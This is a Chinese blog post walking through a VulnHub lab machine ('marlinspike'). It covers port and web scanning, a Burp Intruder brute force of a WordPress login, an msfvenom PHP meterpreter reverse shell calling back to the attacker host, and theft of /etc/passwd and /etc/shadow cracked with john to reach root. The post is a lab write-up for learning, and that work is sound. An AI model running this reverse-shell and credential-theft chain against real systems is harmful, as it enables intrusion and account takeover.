暴力破解实战

最新推荐文章于 2024-04-23 23:11:05 发布
最新推荐文章于 2024-04-23 23:11:05 发布
阅读量644 收藏 2
点赞数
分类专栏: 靶场实战系列 文章标签: 安全 web安全 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_23347209/article/details/125029856
版权

文章目录

环境准备

靶场下载地址:https://download.vulnhub.com
使用Vmware虚拟机中NAT网络
靶机 marlinspike 192.168.146.151
攻击机1: parrot 192.168.146.129
攻击机2:win7渗透机

提示:以下是本篇文章正文内容,下面案例可供参考

一、服务器信息搜集

-A:全面扫描
-p-:全端口扫描
-T<0-5>:设置时序模块
-Pn:非ping扫描,不执行主机发现,一般与其他命令联动

nmap -A -p- -T4 -Pn 192.168.146.151

在这里插入图片描述

二、网站信息搜集

1.浏览网站

在这里插入图片描述

2.nikto对网站目录进行扫描

nikto 是一款用来发现 web 应用程序漏洞的一个工具,常用于对web网页服务器进行全面的多种扫描

nikto -h http://192.168.46.151

发现网站敏感目录:
在这里插入图片描述
右键点击访问👇
在这里插入图片描述
发现是一个json文件
json文件是一种常见的数据存储文件
在这里插入图片描述
点击Log in 进入登录界面
在这里插入图片描述
考虑进行暴力破解用户名和密码😄O(∩_∩)O
在这里插入图片描述
【至次本靶机的信息搜集基本完成】

三、用msf模块破解密码——失败/(ㄒoㄒ)/~~

msfconsole
use auxiliary/scanner/http/wordpress_login_enum
show options
set username admin
set pass_file /usr/share
set fargeturi /secret/
set rhosts 192.168.168.151
run

在这里插入图片描述
在这里插入图片描述
很明显,本方法对于次靶机失败了😕

四、使用burpsuite进行暴力破解——成功O(∩_∩)O

在攻击机win7渗透机上面进行实验👇
post表单抓包后点击右键send to intruder
在这里插入图片描述

简单小补一下burp的小知识哦~😀

  • sinper模式——单向爆破
  • battering ram模式——并发攻击,用户名和密码一样
  • pitchfork模式——交叉攻击(撞库)
  • cluster bomb模式——穷举模式,完整爆破,(常用)

在这里插入图片描述
配置payload的参数
在这里插入图片描述
在这里插入图片描述
start attack发起爆破攻击
爆破出来用户名和密码都是admin👇
在这里插入图片描述
在这里插入图片描述

成功登录后台😄

五、msf框架的使用

1、msf制作php木马

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.146.129 lport=4444 -f raw > /root/shell.php

在这里插入图片描述

2、建立木马监听端

msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.146.129
set lport 4444
exploit

在这里插入图片描述

3、找路径访问——木马上线

然后访问http://192.168.146.151/wordpress/wp-content/themes/twentyseventeen/404.php

之前信息收集阶段nikto扫出来的
在这里插入图片描述
在这里插入图片描述
访问该url
在这里插入图片描述

成功上线
在这里插入图片描述

六、服务器提权

john破解密码
在meterpreter里面

download /etc/passwd
download /etc/shadow

在这里插入图片描述
下载到Downloads里
在这里插入图片描述
破解成功👇
分别是root和marlinspike

unshadow passwd shadow > crack
john crack

在这里插入图片描述
meterpreter里面
输入密码toor

shell
su root

在这里插入图片描述
【提权成功并且是root权限,完成啦~】

出黎on
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SSH密码暴力破解及防御实战
11-30
太狠了吧,SSH密码暴力破解及防御实战,注意安全了,下载学习
python使用requests库爬取淘宝食品信息,包含sign参数破解
a15378785375的博客
03-09 7457
python使用requests库爬取淘宝食品信息,包含sign参数破解。 1.网站分析 参考资料:JS断点调试 https://blog.csdn.net/qq_39009348/article/details/81563831 打开淘宝页面搜索&amp;quot;美食&amp;quot; 共有一百页数据,一页100条数据 右键——检查 或者 按F12 在 NetWork 中的一大坨里找到自己想要的东西(看response里...
使用Nikto扫描网站漏洞
CHK的博客
03-16 8837
Nikto简介 Nikto是一个简单的开源Web服务器扫描程序,可以检查网站并报告它发现的可能用于利用或破解网站的漏洞。此外,它是业界使用最广泛的网站漏洞工具之一,并且在许多圈子中被认为是行业标准。 虽然这个工具非常有效,但它根本不是隐秘的。任何具有入侵检测系统或其他安全措施的站点都将检测到它正在被扫描。最初设计只是用于安全测试,并不在意隐形问题。 【Nikto-百度百科】 Nikto...
安全小课堂丨什么是暴力破解?如何防止暴力破解
最新发布
a38417的博客
04-23 2231
比如一个6位并且全部由数字组成的密码,可能有100万种组合,也就是说最多需要尝试100万次才能找到正确的密码,但也有可能尝试几次后就能找出正确的密码。从理论上来说,只要字典足够庞大,枚举总是能够成功的,也就是说任何密码都能被破解,只是时间的问题。这些方法被称为字典式攻击。一些黑客会整个运行未经删减的词典,并在单词中增加特殊字符和数字,或者使用特殊的单词词典,但这种类型的顺序攻击非常繁琐。这样一来,您就可以针对自己访问的所有网站创建极长且复杂的密码,并且安全地存储,而您只需要记住密码管理器的一个密码就够了。
手把手教你暴力破解
weixin_51513059的博客
11-01 7274
DVWA-暴力破解 手把手教你暴力破解
Burp Suite暴力破解实验(问题+解决方法汇总)
qq_38651516的博客
11-16 7718
步骤: 1. 安装DVWA         1.1 将dvwa.zip文件解压并将文件名修改为dvwa,将文件拷贝到wamp安装目录下的www目录下。(安装地址)         1.2 访问http://localhost/dvwa-master,设置数据库用户名和密码(这里是访问数据库的用户名和密码,在安装wamp中设置的,如果没有设置,默认用户名为root,密码为空
手把手教你一步一步暴力破解密码,学不会来找我
2201_75765956的博客
11-17 1476
但是你不可能一个一个去手动构造数据包,所以在实施暴力破解之前,我们只需要先去获取构造HTTP包所需要的参数,然后扔给暴力破解软件构造工具数据包,然后实施攻击就可以了。暴力破解也可称为穷举法、枚举法,是一种针对于密码的破译方法,将密码进行逐个推算直到找出真正的密码为止。设置长而复杂的密码、在不同的地方使用不同的密码、避免使用个人信息作为密码、定期修改密码等是防御暴力破解的有效方法。暴力破解的原理就是使用攻击者自己的用户名和密码字典,一个一个去枚举,尝试是否能够登录。第三步:选择我们要破解的变量。
JS逆向进阶案例 | 破解加密JSON字符串数据
shine4869的博客
02-20 2835
目录一、抓包分析字段来源二、寻找加密源码三、完善JS代码 一、抓包分析字段来源 二、寻找加密源码 三、完善JS代码
前端传数组到后端的加密解密方法SON.stringify和json_decode
桃花岛主的博客
04-26 422
由于传递过程必须用字符串的形式,所以前端的数组用SON.stringify加密,后端用php的json_decode,解密,可得到最终想要的数组
JS逆向进阶案例 | 破解Base64加密数据
shine4869的博客
02-24 1957
目录
C#实现AES加密和解密JSON数据的例子
huang714的专栏
03-18 159
【代码】C#实现AES加密和解密JSON数据的例子。
解析 gui-config.json出错,可能需要密码解密 的解决方式
热门推荐
一碗单炒饭的专栏
04-13 1万+
问题描述 启动程序时,弹出以下提示 此时需要点击右上角的关闭按钮或者输入解密密码再点击OK 解决方法 如果SS、SSR运行时出现以上提示,说明程序无法正常启动,需要自行解密程序目录下的gui-config.json文件。 此时该文件中的JSON数据无法被程序解析。 如下两种解决方式: 直接删除程序目录下的gui-config.json,不过用户之前所添加的节点信息会全部丢失。需要用户重新进行添...
SSH密码暴力破解及防御实战.pdf
02-13
关于SSH密码暴力破解及防御实战,如有侵权请立即与我联系,我将及时处理,感谢。如有侵权请立即与我联系,我将及时处理,感谢。如有侵权请立即与我联系,我将及时处理,感谢。
SSH暴力破解攻击实战环境准备.pdf
01-14
1、文件上传(File Upload)是大部分Web应用都具备的功能,例如用户上传附件、修改头像、分享图片/视频等 2、正常的文件一般是文档、图片、视频等,Web应用收集之后放入后台存储,需要的时候再调用出来返回 3、如果...
【环境准备】SSH暴力破解攻击实战.pdf
02-22
网络攻防相关,欢迎下载。网络攻防相关,欢迎下载。网络攻防相关,欢迎下载。网络攻防相关,欢迎下载。网络攻防相关,欢迎下载。
php如何解密json字符串
qq_43496814的博客
02-18 445
解密JSON字符串在PHP中并不常见,因为JSON通常用于数据交换,并不需要加密。但如果您是指从一个经过加密的JSON字符串中解密数据,那么这通常涉及到两个步骤:首先解密数据,然后将解密后的数据解析为JSON。
WEB安全实战(带靶场)–暴力破解
renxq097的博客
02-28 6259
CTF靶场实验:暴力破解
暴力破解(Burte Force)
西电卢本伟的博客
04-05 1万+
暴力破解弱口令,pikachu靶场
网络安全工程师必知的暴力破解知识
weixin_51725318的博客
11-22 1541
网络安全工程师必知的暴力破解知识
sqlmap暴力破解
08-26
引用中提到,与暴力破解表名类似,暴力跑的列名可以在txt/common-columns.txt中找到。这个文件包含了一些常见的列名。而引用和引用提到了sqlmap的两个命令,分别是使用--current-db来获取当前数据库的名称,使用--...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值